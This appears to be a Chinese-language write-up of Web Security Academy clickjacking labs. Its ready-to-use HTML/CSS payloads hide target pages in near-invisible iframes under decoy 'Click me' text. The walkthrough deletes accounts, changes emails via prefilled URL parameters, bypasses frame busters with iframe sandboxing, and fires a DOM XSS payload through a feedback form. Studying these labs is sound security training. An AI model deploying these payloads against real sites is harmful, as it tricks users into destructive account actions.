具有 CSRF 令牌保护的基本点击劫持
data:image/s3,"s3://crabby-images/1e11e/1e11eeab15451d76857e742c40d85233632a543b" alt="image-20221204112349097"
这里存在一个删除账号的按钮 其中使用csrf进行了保护 这里需要我们去伪造页面欺骗用户点击这个删除按钮
data:image/s3,"s3://crabby-images/9991d/9991df354de7244f21c5e6b02f329232ccbe0e30" alt="image-20221204114809697"
我们先来看一下官方的payload
<style> iframe { position:relative; width:$width_value; height: $height_value; opacity: $opacity; z-index: 2; } div { position:absolute; top:$top_value; left:$side_value; z-index: 1; } </style> <div>Test me</div> <iframe src="YOUR-LAB-ID.web-security-academy.net/my-account"></iframe>
|
其中这里先包含了一个 iframe标签
<iframe src="https://0acd002304e24941c0a316e7009900d2.web-security-academy.net/my-account"></iframe>
|
如果没登录的话可以先登录一下
data:image/s3,"s3://crabby-images/adc3f/adc3f5a92ac629b64e792a6ac6e8f9a0e580c55f" alt="image-20221204115802889"
现在我们需要调整一下样式使他变得好看点
<style> iframe{ position:relative; width: 700px; height: 800px; opacity: 0.1; z-index: 2; } </style> <iframe src="https://0a18001503733d79c1f925e000e5006c.web-security-academy.net/my-account"></iframe>
|
data:image/s3,"s3://crabby-images/96b2c/96b2c50f6c72b738990a18bae60c0ccd6a1b8d6f" alt="image-20221204123008259"
变成了这样 我们还需要一个点击字样
data:image/s3,"s3://crabby-images/7c7da/7c7da9d10d6ce5c67efd9353f85443b2fbfd042e" alt="image-20221204123033596"
<style> iframe{ position:relative; width: 700px; height: 800px; opacity: 0.1; z-index: 2; } </style> <div>Test me</div> <iframe src="https://0a18001503733d79c1f925e000e5006c.web-security-academy.net/my-account"></iframe>
|
data:image/s3,"s3://crabby-images/bf6f1/bf6f1bd5f8434a8406a14b3b24fceaf5d5afde9a" alt="image-20221204123133050"
调整一下位置
data:image/s3,"s3://crabby-images/7b54b/7b54bc8c83607037ecafb657dd6b0d332c52261c" alt="image-20221204124350609"
<style> iframe{ position:relative; width: 1000px; height: 700px; opacity: 0.1; z-index: 2; } div{ position: absolute; top:520px; left: 80px; z-index: 1 ; } </style> <div>Test me</div> <iframe src="https://0a18001503733d79c1f925e000e5006c.web-security-academy.net/my-account"></iframe>
|
接着需要修改一下透明度 还需要吧Test me改成Click me
data:image/s3,"s3://crabby-images/10bce/10bce909383873fd9ee58a9067fa79763b5d8ec9" alt="image-20221204124511279"
<style> iframe{ position:relative; width: 1000px; height: 700px; opacity: 0.00000001; z-index: 2; } div{ position: absolute; top:520px; left: 80px; z-index: 1 ; } </style> <div>Click me</div> <iframe src="https://0a18001503733d79c1f925e000e5006c.web-security-academy.net/my-account"></iframe>
|
data:image/s3,"s3://crabby-images/a499c/a499cc40627ba37cb1447a01a5f7b9c898f485e5" alt="image-20221204124822466"
使用从 URL 参数预填充的表单输入数据进行点击劫持
data:image/s3,"s3://crabby-images/e9e65/e9e65a0e71ed86b1c194780d071ce198da2c76ec" alt="image-20221204124853871"
这里当我们登录之后 如果直接带email参数访问 会自动填充进去
data:image/s3,"s3://crabby-images/fc936/fc9362704a0340a7972b3bab6a609d20320dc197" alt="image-20221204125601472"
<style> iframe{ position: relative; width: 400px; height: 600px; opacity: 0.000001; z-index: 2; } div{ position: absolute; top:505px; left:100px; z-index: 1; } </style> <div>Click me</div> <iframe src="https://0a35002c043e60f9c04d46c9006400af.web-security-academy.net/my-account?email=hacker@attacker-website.com"></iframe>
|
data:image/s3,"s3://crabby-images/095a8/095a87902f7eec9c78e3f0fee294750ceca12559" alt="image-20221204130931161"
使用 frame buster 脚本进行点击劫持
data:image/s3,"s3://crabby-images/6829d/6829d8765dd8a12522afd6e0e873c690a1d174fd" alt="image-20221204135412340"
这里的 farme buster 大致意思就是只接受自己是最顶层网页 但是当iframe指定 sandbox 为allow-forms或者 allow-scripts,并且忽略 allow-top-ngvigation会使iframe中的网页不知道自己是否是最顶层网页
<style> iframe{ position: relative; width: 1000px; height: 700px; opacity: 0.1; z-index: 2; } div{ position: absolute; top:475px; left:98px; z-index: 1; } </style> <div>Click me</div> <iframe sandbox="allow-forms" src="https://0a35002c043e60f9c04d46c9006400af.web-security-academy.net/my-account?email=hacker@attacker-website.com"></iframe>
|
data:image/s3,"s3://crabby-images/ae714/ae714a1724c5e2b9869fae193ff1be2b9e6892a7" alt="image-20221204144436494"
利用点击劫持漏洞触发基于 DOM 的 XSS
data:image/s3,"s3://crabby-images/e7944/e794435017a77fced5dfd1b3558341012fd226e2" alt="image-20221204144734283"
data:image/s3,"s3://crabby-images/07f66/07f6690c20ba7c1081cea6972a1ebd51171fcc31" alt="image-20221204162738301"
这个靶场也可以预填充
<style> iframe{ position: relative; width: 2000px; height: 1500px; opacity: 0.000001; z-index: 2; } div{ position: absolute; top: 830px; left: 460px; z-index: 1; } </style> <div>Click me</div> <iframe src="https://0af90067041c65cfc02a030a00a8007f.web-security-academy.net/feedback?name=%3Cimg%20src=1%20onerror=print()%3E&email=hacker@attacker-website.com&subject=test&message=test"></iframe>
|
data:image/s3,"s3://crabby-images/8a26e/8a26e50080a89d3b7c337cd01ff9567d822467d2" alt="image-20221204164022028"
多步点击劫持
data:image/s3,"s3://crabby-images/2f7a3/2f7a31377088ed35c372e364b003beea887932f7" alt="image-20221204164053818"
这里是让我们点击两次 执行劫持命令
data:image/s3,"s3://crabby-images/2eb90/2eb90d385f55e6139d1fde5efdf34885fb7e819c" alt="image-20221204170249611"
data:image/s3,"s3://crabby-images/36596/365964a0d86087767b454b4734f4f0b6c2a142e1" alt="image-20221204170242543"
<style> iframe{ position:relative; width: 2000px; height: 1000px; opacity: 0.1; z-index: 2; } .firstClick,.secondClick{ position: absolute; top: 540px; left: 442px; z-index: 1;
} .secondClick{ top: 340px; left: 580px; } </style> <div class="firstClick">Click me first</div> <div class="secondClick">Click me second</div> <iframe src="https://0a0a001703e0d66fc07443c70068004e.web-security-academy.net/my-account"></iframe>
|
data:image/s3,"s3://crabby-images/790d5/790d5776023b0ffc19c6c327af4c9ad8f2cb8e75" alt="image-20221204170739282"